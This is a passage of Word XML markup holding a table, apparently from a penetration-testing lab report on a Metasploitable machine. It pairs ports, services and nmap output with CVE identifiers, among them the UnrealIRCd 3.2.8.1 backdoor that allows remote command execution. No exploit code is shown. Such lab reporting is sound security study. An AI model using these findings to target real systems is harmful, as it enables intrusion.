          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7AB55744" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2019-19196,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2019-19194</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="19E1C11E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>VNC or Virtual Network Computing is a service that uses the Remote Frame Buffer protocol to enable graphical remote access of another system. It is an interactive session since the user can give the mouse and keyboard inputs through VNC to the original system.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="5231E2AE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7E273DA4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4274C3D3" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14894A40" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71F22F7F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>(access denied)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="73150874" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2024-21886,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2024-0229</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="08F24AF2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X11 forwarding, ssh -</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>X ,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> is an SSH protocol that enables users to run graphical applications on a remote server and interact with them using their local display and I/O devices. It is commonly relied upon by developers for securely interacting with remote machines across wide and heterogeneous server fleets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="7AB94B91" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="330"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5ED212F6" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C2E5AD5" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6697</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="595F73B2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">-info: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DE65718" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   users: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48A80EFB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   servers: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72539629" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>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lusers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BB4A114" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>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lservers</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: 0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B942B3F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   server: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>irc.Metasploitable.LAN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6E4BE574" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   version: Unreal3.2.8.1. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>irc.Metasploitable.LAN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="70AE7D9C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   uptime: 0 days, 0:20:52</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7115CE38" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   source ident: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>nmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6C95209E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   source host: Test-4C12EABE.localdomain</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30114B5B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>|</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_  error</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Closing Link: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hdvhgxwwi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>kali.localdomain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">] (Quit: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>hdvhgxwwi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2284A293" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>irc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="555DA3F0" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Admin email </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>admin@Metasploitable.LAN</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0467136B" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2010-2075,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2009-4893</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0160B290" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Backdoor that was inserted into the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>UnrealIRCd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> source code, allowing remote attackers to execute arbitrary commands with the privileges of the user running the IRC daemon.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75AEE4BF" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="518A7A8F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
